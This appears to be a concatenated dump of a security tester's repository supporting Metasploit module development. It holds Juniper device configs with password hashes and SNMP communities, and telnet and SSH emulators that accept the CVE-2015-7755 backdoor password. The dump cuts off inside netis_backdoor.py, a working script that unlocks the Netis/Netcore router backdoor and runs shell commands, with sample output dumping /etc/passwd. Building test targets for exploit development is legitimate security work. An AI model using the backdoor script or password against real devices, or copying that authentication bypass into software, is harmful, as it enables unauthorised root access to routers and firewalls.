    ge-0/0/19 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/20 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/21 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/22 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/23 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/24 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/25 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/26 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/27 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/28 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/29 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/30 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/31 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/32 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/33 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/34 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/35 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/36 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/37 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/38 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/39 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/40 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/41 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/42 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/43 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/44 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/45 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/46 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/0/47 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/1/0 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/1/1 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/1/2 {
        unit 0 {
            family ethernet-switching;
        }
    }
    ge-0/1/3 {
        unit 0 {
            family ethernet-switching;
        }
    }
    me0 {
        unit 0 {
            family inet {
                address 192.168.1.1/24;
            }
        }
    }
    pp0 {
        unit 0 {
            ppp-options {
                pap {
                    local-name "'pap_username'";
                    local-password "$9$he4revM87-dsevm5TQCAp0BErvLxd4JDNdkPfT/9BIR"; ## SECRET-DATA
                }
            }
        }
    }
    st0 {
        unit 1;
    }
    vlan {
        unit 0 {
            family inet {
                dhcp {
                    vendor-id Juniper-ex2200-48t-4g;
                }
            }
        }
    }
}
snmp {
    name "snmp name";
    description "snmp description";
    location basement;
    contact admin;
    view jweb-view-all {
        oid .1 include;
    }
    community read {
        authorization read-only;
    }
    community write {
        view jweb-view-all;
        authorization read-write;
    }
    community public {
        authorization read-only;
    }
    community private {
        authorization read-write;
    }
    community secretsauce {
        authorization read-write;
    }
    community "hello there" {
        authorization read-write;
    }
}
routing-options {
    static {
        route 0.0.0.0/0 next-hop 192.168.1.254;
    }
}
protocols {
    igmp-snooping {
        vlan all;
    }
    rstp;
    lldp {
        interface all;
    }
    lldp-med {
        interface all;
    }
}
access {
    radius-server {
        1.1.1.1 secret "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV"; ## SECRET-DATA
    }
}
ethernet-switching-options {
    storm-control {
        interface all;
    }
}
vlans {
    default {
        l3-interface vlan.0;
    }
}

{master:0}
newuser@h00dieJuniperEx2200>
--------------------------------------------------------------------------------
/juniper_ex2200_access_denied.config:
--------------------------------------------------------------------------------
show configuration
## Last commit: 2016-08-15 13:35:48 UTC by root
version /* ACCESS-DENIED */;
system { /* ACCESS-DENIED */ };
chassis { /* ACCESS-DENIED */ };
interfaces { /* ACCESS-DENIED */ };
snmp { /* ACCESS-DENIED */ };
routing-options { /* ACCESS-DENIED */ };
protocols { /* ACCESS-DENIED */ };
access { /* ACCESS-DENIED */ };
ethernet-switching-options { /* ACCESS-DENIED */ };
vlans { /* ACCESS-DENIED */ };

{master:0}
newuser2@h00dieJuniperEx2200>
--------------------------------------------------------------------------------
/juniper_firmware/README.md:
--------------------------------------------------------------------------------
# Instructions
The files in this directory are for loading firmware that contains CVE-2015-7755 onto the Fortinet SSG-5 and SSG-20.
Please see [Juniper Instructions](http://kb.juniper.net/InfoCenter/index?page=content&id=TSB16495&actp=search) to properly load the firmware.
--------------------------------------------------------------------------------
/juniper_firmware/imagekey.cer:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/juniper_firmware/imagekey.cer
--------------------------------------------------------------------------------
/juniper_firmware/ssg5ssg20.6.3.0r19.0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/juniper_firmware/ssg5ssg20.6.3.0r19.0
--------------------------------------------------------------------------------
/juniper_ssg5_emulator.py:
--------------------------------------------------------------------------------
#!/usr/bin/python

#code base from http://homepages.ius.edu/jfdoyle/B438/HTML/chatserver4chatserver5Python.htm
#this is a juniper ssg5 emulator for testing against the Metasploit modules for brocade,
#based on the SSG5 I own. We've only emulated a few functions (?, get config, get system)

import socket, threading
import string
import time
from juniper_strings import juniper

#format is ('username','password')
un_pass_config = {
    ('netscreen','netscreen'),
}


class server(threading.Thread) :
    def __init__(self, (socket, address) ):
        threading.Thread.__init__(self)
        self.SOCKET=socket
        self.ADDRESS=address

    def run(self) :
        lock.acquire()
        vector.append(self)
        lock.release()
        print 'Connected ', self.ADDRESS
        valid_login = False
        throwaway=self.SOCKET.recv(1024) # catch a strange issue where we're getting nothing
        while not valid_login: #login loop
            #send the login banner
            self.SOCKET.send("Remote Management Console\n")
            self.SOCKET.send('login: ')
            username=self.SOCKET.recv(1024) # Read from client
            self.SOCKET.send('password: ')
            password=self.SOCKET.recv(1024) # Read from client
            username = username.strip()
            password = password.strip()
            if password == "<<< %s(un='%s') = %u" and username != "": #CVE-2015-7755
                print("Successful login via Juniper backdoor CVE-2015-7755 <<< %s(un='%s') = %u")
                valid_login = True
            else:
                for user,passw in un_pass_config:
                    if user==username and passw == password:
                        print("Successful login via %s:%s" %(user,passw))
                        valid_login = True
            if not valid_login:
                print("FAILED login via %s:%s" %(username,password))
                time.sleep(5)
                self.SOCKET.send(" ### Login failed")
        while True:
            self.SOCKET.send(juniper.get("PROMPT"))
            From=self.SOCKET.recv(1024) # Read from client
            #telnet clients tend to send some binary before giving input to the client to type... so we'll filter that
            if len(From) <= 0:
                continue
            if not From[0] in string.printable:
                continue
            From_upper = From.upper().strip()
            if From_upper == 'EXIT':
                self.SOCKET.close()
                break
            else:
                self.SOCKET.send(juniper.get(From_upper, ' ^------unknown keyword %s\n' %(From)))
                print "User Input:", From.replace("\n","")
        print 'Disconnected ', self.ADDRESS
        lock.acquire()
        vector.remove(self)
        lock.release()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
    try:
        s.bind(('', 23))
        break
    except socket.error:
        print("[e] Address in use or permission error, sleeping 10sec then trying again")
        time.sleep(10)
s.listen(4)
vector = []
lock=threading.Lock()
print("Server started")
while True : # Wait for connection/run server
    server( s.accept() ).start();
--------------------------------------------------------------------------------
/juniper_ssg5_screenos.conf:
--------------------------------------------------------------------------------
unset key protection enable
set clock timezone 0
set vrouter trust-vr sharable
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset auto-route-export
exit
set alg appleichat enable
unset alg appleichat re-assembly enable
set alg sctp enable
set auth-server "Local" id 0
set auth-server "Local" server-name "Local"
set auth default auth server "Local"
set auth radius accounting port 1646
set admin name "netscreen"
set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
set admin auth web timeout 10
set admin auth dial-in timeout 3
set admin auth server "Local"
set admin format dos
set zone "Trust" vrouter "trust-vr"
set zone "Untrust" vrouter "trust-vr"
set zone "DMZ" vrouter "trust-vr"
set zone "VLAN" vrouter "trust-vr"
set zone "Untrust-Tun" vrouter "trust-vr"
set zone "Trust" tcp-rst
set zone "Untrust" block
unset zone "Untrust" tcp-rst
set zone "MGT" block
unset zone "V1-Trust" tcp-rst
unset zone "V1-Untrust" tcp-rst
set zone "DMZ" tcp-rst
unset zone "V1-DMZ" tcp-rst
unset zone "VLAN" tcp-rst
set zone "Untrust" screen tear-drop
set zone "Untrust" screen syn-flood
set zone "Untrust" screen ping-death
set zone "Untrust" screen ip-filter-src
set zone "Untrust" screen land
set zone "V1-Untrust" screen tear-drop
set zone "V1-Untrust" screen syn-flood
set zone "V1-Untrust" screen ping-death
set zone "V1-Untrust" screen ip-filter-src
set zone "V1-Untrust" screen land
set interface "ethernet0/0" zone "Untrust"
set interface "ethernet0/1" zone "DMZ"
set interface "bgroup0" zone "Trust"
set interface bgroup0 port ethernet0/2
set interface bgroup0 port ethernet0/3
set interface bgroup0 port ethernet0/4
set interface bgroup0 port ethernet0/5
set interface bgroup0 port ethernet0/6
unset interface vlan1 ip
set interface bgroup0 ip 192.168.1.1/24
set interface bgroup0 nat
unset interface vlan1 bypass-others-ipsec
unset interface vlan1 bypass-non-ip
set interface bgroup0 ip manageable
set interface ethernet0/0 dhcp client enable
set interface ethernet0/0 dhcp client settings autoconfig
set interface "serial0/0" modem settings "USR" init "AT&F"
set interface "serial0/0" modem settings "USR" active
set interface "serial0/0" modem speed 115200
set interface "serial0/0" modem retry 3
set interface "serial0/0" modem interval 10
set interface "serial0/0" modem idle-time 10
set ip tftp retry 30
set ip tftp timeout 30
set flow tcp-mss
unset flow no-tcp-seq-check
set flow tcp-syn-check
unset flow tcp-syn-bit-check
set flow reverse-route clear-text prefer
set flow reverse-route tunnel always
set pki authority default scep mode "auto"
set pki x509 default cert-path partial
set user "testuser" uid 1
set user "testuser" type auth
set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
set user "testuser" enable
set crypto-policy
exit
set ike respond-bad-spi 1
set ike ikev2 ike-sa-soft-lifetime 60
unset ike ikeid-enumeration
unset ike dos-protection
unset ipsec access-session enable
set ipsec access-session maximum 5000
set ipsec access-session upper-threshold 0
set ipsec access-session lower-threshold 0
set ipsec access-session dead-p2-sa-timeout 0
unset ipsec access-session log-error
unset ipsec access-session info-exch-connected
unset ipsec access-session use-error-log
set url protocol websense
exit
set policy id 1 from "Trust" to "Untrust" "Any" "Any" "ANY" permit
set policy id 1
exit
set nsmgmt bulkcli reboot-timeout 60
set ssh version v2
set config lock timeout 5
unset license-key auto-update
set telnet client enable
set snmp port listen 161
set snmp port trap 162
set snmpv3 local-engine id "0162122013002408"
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset add-default-route
exit
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
exit
--------------------------------------------------------------------------------
/juniper_ssg5_ssh_emulator.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# Copyright (C) 2003-2007 Robey Pointer
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.

"""
This code is based off of https://github.com/paramiko/paramiko/blob/master/demos/demo_server.py
"""
import base64
from binascii import hexlify
import os
import socket
import sys
import threading
import traceback

from juniper_strings import juniper

import paramiko
from paramiko.py3compat import b, u, decodebytes

# setup logging
paramiko.util.log_to_file('demo_server.log')

host_key = paramiko.RSAKey(filename='test_rsa.key')
#host_key = paramiko.DSSKey(filename='test_dss.key')

print('Read key: ' + u(hexlify(host_key.get_fingerprint())))


class Server (paramiko.ServerInterface):
    # 'data' is the output of base64.encodestring(str(key))
    # (using the "user_rsa_key" files)
    data = (b'AAAAB3NzaC1yc2EAAAABIwAAAIEAyO4it3fHlmGZWJaGrfeHOVY7RWO3P9M7hp'
            b'fAu7jJ2d7eothvfeuoRFtJwhUmZDluRdFyhFY/hFAh76PJKGAusIqIQKlkJxMC'
            b'KDqIexkgHAfID/6mqvmnSJf0b5W8v5h2pI/stOSwTQ+pxVhwJ9ctYDhRSlF0iT'
            b'UWT10hcuO4Ks8=')
    good_pub_key = paramiko.RSAKey(data=decodebytes(data))

    def __init__(self):
        self.event = threading.Event()

    def check_channel_request(self, kind, chanid):
        if kind == 'session':
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_auth_password(self, username, password):
        if password == "<<< %s(un='%s') = %u" and username != "": #CVE-2015-7755
            print("Successful login via Juniper backdoor CVE-2015-7755 <<< %s(un='%s') = %u")
            return paramiko.AUTH_SUCCESSFUL
        elif (username == 'netscreen') and (password == 'netscreen'):
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

    # def check_auth_publickey(self, username, key):
    #     print('Auth attempt with key: ' + u(hexlify(key.get_fingerprint())))
    #     if (username == 'robey') and (key == self.good_pub_key):
    #         return paramiko.AUTH_SUCCESSFUL
    #     return paramiko.AUTH_FAILED

    # def check_auth_gssapi_with_mic(self, username,
    #                                gss_authenticated=paramiko.AUTH_FAILED,
    #                                cc_file=None):
    #     """
    #     .. note::
    #         We are just checking in `AuthHandler` that the given user is a
    #         valid krb5 principal! We don't check if the krb5 principal is
    #         allowed to log in on the server, because there is no way to do that
    #         in python. So if you develop your own SSH server with paramiko for
    #         a certain platform like Linux, you should call ``krb5_kuserok()`` in
    #         your local kerberos library to make sure that the krb5_principal
    #         has an account on the server and is allowed to log in as a user.
    #
    #     .. seealso::
    #         `krb5_kuserok() man page
    #         `_
    #     """
    #     if gss_authenticated == paramiko.AUTH_SUCCESSFUL:
    #         return paramiko.AUTH_SUCCESSFUL
    #     return paramiko.AUTH_FAILED

    def check_auth_gssapi_keyex(self, username,
                                gss_authenticated=paramiko.AUTH_FAILED,
                                cc_file=None):
        if gss_authenticated == paramiko.AUTH_SUCCESSFUL:
            return paramiko.AUTH_SUCCESSFUL
        return paramiko.AUTH_FAILED

    def enable_auth_gssapi(self):
        UseGSSAPI = False
        GSSAPICleanupCredentials = False
        return UseGSSAPI

    def get_allowed_auths(self, username):
        return 'password'

    def check_channel_shell_request(self, channel):
        self.event.set()
        return True

    def check_channel_pty_request(self, channel, term, width, height, pixelwidth,
                                  pixelheight, modes):
        return True


DoGSSAPIKeyExchange = False

# now connect
try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('', 22))
except Exception as e:
    print('*** Bind failed: ' + str(e))
    traceback.print_exc()
    sys.exit(1)

try:
    sock.listen(100)
    print('Listening for connection ...')
    client, addr = sock.accept()
except Exception as e:
    print('*** Listen/accept failed: ' + str(e))
    traceback.print_exc()
    sys.exit(1)

print('Got a connection!')

try:
    t = paramiko.Transport(client, gss_kex=DoGSSAPIKeyExchange)
    t.set_gss_host(socket.getfqdn(""))
    try:
        t.load_server_moduli()
    except:
        print('(Failed to load moduli -- gex will be unsupported.)')
        raise
    t.add_server_key(host_key)
    server = Server()
    try:
        t.start_server(server=server)
    except paramiko.SSHException:
        print('*** SSH negotiation failed.')
        sys.exit(1)

    # wait for auth
    chan = t.accept(20)
    if chan is None:
        print('*** No channel.')
        sys.exit(1)
    print('Authenticated!')

    server.event.wait(10)
    if not server.event.is_set():
        print('*** Client never asked for a shell.')
        sys.exit(1)
    while True:
        chan.send(juniper.get("PROMPT"))
        From = " "
        while ord(From[-1]) != 13:
            From += chan.recv(1024)
            chan.send(From[-1]) #echo back to user screen
        From_upper = From.upper().strip()
        if From_upper == 'EXIT':
            chan.close()
            break
        else:
            # chan.send('\n')
            output = juniper.get(From_upper, ' ^------unknown keyword %s\n' %(From))
            chan.send('\r\n')
            for line in output.split('\n'):
                chan.send(line + '\r\n')
            print "User Input:", From.replace("\n","")


except Exception as e:
    print('*** Caught exception: ' + str(e.__class__) + ': ' + str(e))
    traceback.print_exc()
    try:
        t.close()
    except:
        pass
    sys.exit(1)
--------------------------------------------------------------------------------
/juniper_strings.py:
--------------------------------------------------------------------------------
juniper = {
    'GET SYSTEM':"""Product Name: SSG5-Serial
Serial Number: 0000000000000008, Control Number: 00000000
Hardware Version: 0710(0)-(00), FPGA checksum: 00000000, VLAN1 IP (0.0.0.0)
Flash Type: Samsung
Software Version: 6.3.0r19.0, Type: Firewall+VPN
Feature: AV-K
BOOT Loader Version: 1.3.2
Compiled by build_master at: Sun Apr 19 21:42:28 PDT 2015
Base Mac: 0000.0000.a3c0
File Name: ssg5ssg20.6.3.0r19.0, Checksum: 8c102d42
, Total Memory: 128MB

Date 03/28/2016 19:51:01, Daylight Saving Time enabled
The Network Time Protocol is Disabled
Up 0 hours 26 minutes 29 seconds Since 28Mar2016:19:24:32
Total Device Resets: 2, Last Device Reset at: 03/27/2016 19:17:05

System in NAT/route mode.

Use interface IP, Config Port: 80
Manager IP enforced: False
Manager IPs: 0

Address Mask Vsys
---------------------------------------- ---------------------------------------- --------------------
User Name: netscreen

Interface serial0/0:
description serial0/0
number 21, if_info 1848, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a300
bandwidth: physical 92kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/0:
description ethernet0/0
number 0, if_info 0, if_index 0, mode route
link down, phy-link down, admin status up
status change:0
vsys Root, zone Untrust, vr trust-vr
dhcp client enabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a301
*manage ip 0.0.0.0, mac 0000.0000.a301
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/1:
description ethernet0/1
number 5, if_info 440, if_index 0, mode nat
link down, phy-link down, admin status up
status change:0
vsys Root, zone DMZ, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a302
*manage ip 0.0.0.0, mac 0000.0000.a302
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface ethernet0/2:
description ethernet0/2
number 6, if_info 528, if_index 0
link down, phy-link down
status change:0
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 0000.0000.a303
Interface ethernet0/3:
description ethernet0/3
number 7, if_info 616, if_index 0
link up, phy-link up/full-duplex
status change:1, last change:03/28/2016 19:24:34
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 0000.0000.a304
Interface ethernet0/4:
description ethernet0/4
number 8, if_info 704, if_index 0
link down, phy-link down
status change:0
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 0000.0000.a305
Interface ethernet0/5:
description ethernet0/5
number 9, if_info 792, if_index 0
link down, phy-link down
status change:0
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 0000.0000.a306
Interface ethernet0/6:
description ethernet0/6
number 10, if_info 880, if_index 0
link down, phy-link down
status change:0
member of bgroup0
vsys Root, zone Null, vr untrust-vr
*ip 0.0.0.0/0 mac 0000.0000.a307
Interface bgroup0:
description bgroup0
number 11, if_info 968, if_index 0, mode nat
link up, phy-link up/full-duplex, admin status up
status change:1, last change:03/28/2016 19:24:34
vsys Root, zone Trust, vr trust-vr
dhcp client disabled
PPPoE disabled
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 192.168.1.1/24 mac 0000.0000.a308
*manage ip 192.168.1.1, mac 0000.0000.a308
route-deny disable
bandwidth: physical 100000kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup1:
description bgroup1
number 12, if_info 1056, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a309
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup2:
description bgroup2
number 13, if_info 1144, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a30a
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
Interface bgroup3:
description bgroup3
number 14, if_info 1232, if_index 0
link down, phy-link down, admin status up
status change:0
vsys Root, zone Null, vr untrust-vr
admin mtu 0, operating mtu 1500, default mtu 1500
*ip 0.0.0.0/0 mac 0000.0000.a30b
bandwidth: physical 0kbps, configured egress [gbw 0kbps mbw 0kbps]
configured ingress mbw 0kbps, current bw 0kbps
total allocated gbw 0kbps
""",
    "?": """clear clear dynamic system info
delete delete persistent info in flash
exec exec system commands
exit exit command console
get get system information
mtrace multicast traceroute from source to destination
ping ping other host
reset reset system
save save command
set configure system parameters
telnet Telnet other hostname
trace-route trace route
unset unconfigure system parameters
""",
    "GET CONFIG":"""Total Config size 3679:
unset key protection enable
set clock timezone 0
set vrouter trust-vr sharable
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset auto-route-export
exit
set alg appleichat enable
unset alg appleichat re-assembly enable
set alg sctp enable
set auth-server "Local" id 0
set auth-server "Local" server-name "Local"
set auth default auth server "Local"
set auth radius accounting port 1646
set admin name "netscreen"
set admin password "nKVUM2rwMUzPcrkG5sWIHdCtqkAibn"
set admin auth web timeout 10
set admin auth dial-in timeout 3
set admin auth server "Local"
set admin format dos
set zone "Trust" vrouter "trust-vr"
set zone "Untrust" vrouter "trust-vr"
set zone "DMZ" vrouter "trust-vr"
set zone "VLAN" vrouter "trust-vr"
set zone "Untrust-Tun" vrouter "trust-vr"
set zone "Trust" tcp-rst
set zone "Untrust" block
unset zone "Untrust" tcp-rst
set zone "MGT" block
unset zone "V1-Trust" tcp-rst
unset zone "V1-Untrust" tcp-rst
set zone "DMZ" tcp-rst
unset zone "V1-DMZ" tcp-rst
unset zone "VLAN" tcp-rst
set zone "Untrust" screen tear-drop
set zone "Untrust" screen syn-flood
set zone "Untrust" screen ping-death
set zone "Untrust" screen ip-filter-src
set zone "Untrust" screen land
set zone "V1-Untrust" screen tear-drop
set zone "V1-Untrust" screen syn-flood
set zone "V1-Untrust" screen ping-death
set zone "V1-Untrust" screen ip-filter-src
set zone "V1-Untrust" screen land
set interface "ethernet0/0" zone "Untrust"
set interface "ethernet0/1" zone "DMZ"
set interface "bgroup0" zone "Trust"
set interface bgroup0 port ethernet0/2
set interface bgroup0 port ethernet0/3
set interface bgroup0 port ethernet0/4
set interface bgroup0 port ethernet0/5
set interface bgroup0 port ethernet0/6
unset interface vlan1 ip
set interface bgroup0 ip 192.168.1.1/24
set interface bgroup0 nat
unset interface vlan1 bypass-others-ipsec
unset interface vlan1 bypass-non-ip
set interface bgroup0 ip manageable
set interface ethernet0/0 dhcp client enable
set interface ethernet0/0 dhcp client settings autoconfig
set interface "serial0/0" modem settings "USR" init "AT&F"
set interface "serial0/0" modem settings "USR" active
set interface "serial0/0" modem speed 115200
set interface "serial0/0" modem retry 3
set interface "serial0/0" modem interval 10
set interface "serial0/0" modem idle-time 10
set ip tftp retry 30
set ip tftp timeout 30
set flow tcp-mss
unset flow no-tcp-seq-check
set flow tcp-syn-check
unset flow tcp-syn-bit-check
set flow reverse-route clear-text prefer
set flow reverse-route tunnel always
set pki authority default scep mode "auto"
set pki x509 default cert-path partial
set user "testuser" uid 1
set user "testuser" type auth
set user "testuser" hash-password "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE="
set user "testuser" enable
set crypto-policy
exit
set ike respond-bad-spi 1
set ike ikev2 ike-sa-soft-lifetime 60
unset ike ikeid-enumeration
unset ike dos-protection
unset ipsec access-session enable
set ipsec access-session maximum 5000
set ipsec access-session upper-threshold 0
set ipsec access-session lower-threshold 0
set ipsec access-session dead-p2-sa-timeout 0
unset ipsec access-session log-error
unset ipsec access-session info-exch-connected
unset ipsec access-session use-error-log
set url protocol websense
exit
set policy id 1 from "Trust" to "Untrust" "Any" "Any" "ANY" permit
set policy id 1
exit
set nsmgmt bulkcli reboot-timeout 60
set ssh version v2
set config lock timeout 5
unset license-key auto-update
set telnet client enable
set snmp port listen 161
set snmp port trap 162
set snmpv3 local-engine id "0162122013002408"
set vrouter "untrust-vr"
exit
set vrouter "trust-vr"
unset add-default-route 284 | exit 285 | set vrouter "untrust-vr" 286 | exit 287 | set vrouter "trust-vr" 288 | exit 289 | """, 290 | "PROMPT": "ssg5-serial-> " 291 | } -------------------------------------------------------------------------------- /netcore/README.md: -------------------------------------------------------------------------------- 1 | For help in debugging https://github.com/rapid7/metasploit-framework/pull/6880 2 | -------------------------------------------------------------------------------- /netcore/netcore_module_check_then_run_sanitized_160525-210525_clean.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_check_then_run_sanitized_160525-210525_clean.pcap -------------------------------------------------------------------------------- /netcore/netcore_module_run_big_endian_sanitized_160525-210552.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_run_big_endian_sanitized_160525-210552.pcap -------------------------------------------------------------------------------- /netcore/netcore_module_run_sanitized_160525-210507.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_module_run_sanitized_160525-210507.pcap -------------------------------------------------------------------------------- /netcore/netcore_python_sanitized_160525-210510_clean.pcap: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/fc1e874cce797a51035998fdde0f0dff39d7e6a4/netcore/netcore_python_sanitized_160525-210510_clean.pcap -------------------------------------------------------------------------------- /netis_backdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import argparse 3 | import binascii 4 | ''' 5 | Example run: 6 | root@rageKali:/media/veracrypt1/stcyr/git/MSF-Testing-Scripts# python netis_backdoor.py 192.168.1.1 7 | Unlocking Backdoor 8 | Quit to quit loop 9 | Netis> ls /tmp/ 10 | AuCVM 11 | XqdHc 12 | bVOQm 13 | br_type 14 | bridge_init 15 | cfg-macclone 16 | checkupfile 17 | ddfile 18 | default_rt 19 | dhcpd_action 20 | file.txt 21 | hzbjo 22 | igd_config.old 23 | jiDOo 24 | log 25 | ntp_tmp 26 | passwd 27 | reg_domain 28 | syslogd_support 29 | tmp.txt 30 | update_main 31 | version 32 | wan_type 33 | workmode 34 | 35 | Netis> cat /etc/passwd 36 | root:abSQTPcIskFGc:0:0:root:/:/bin/sh 37 | nobody:x:99:99:Nobody:/: 38 | 39 | ''' 40 | parser = argparse.ArgumentParser(description='Netis backdoor') 41 | parser.add_argument('IP', help='IP of router to connect to') 42 | 43 | args = parser.parse_args() 44 | 45 | def send(command, print_response = True): 46 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 47 | #s.connect((args.IP, 53413)) 48 | s.sendto("AA\x00\x00AAAA%s\x00" %(command), (args.IP, 53413)) 49 | if print_response: 50 | resp = s.recv(2048) 51 | resp = resp[8:] 52 | if binascii.hexlify(resp) == "000000ff": 53 | print("No response, command not found or error in command") 54 | else: 55 | print(resp) 56 | 57 | def login(): 58 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 59 | #s.connect((args.IP, 53413)) 60 | s.sendto("AAAAAAAAnetcore\x00", (args.IP, 53413)) 61 | 62 | print("Unlocking Backdoor") 63 | login() 64 | input = "" 65 | print("Quit to quit loop") 66 | input = raw_input("Netis> ").strip() 67 | while not input.strip().upper() in 
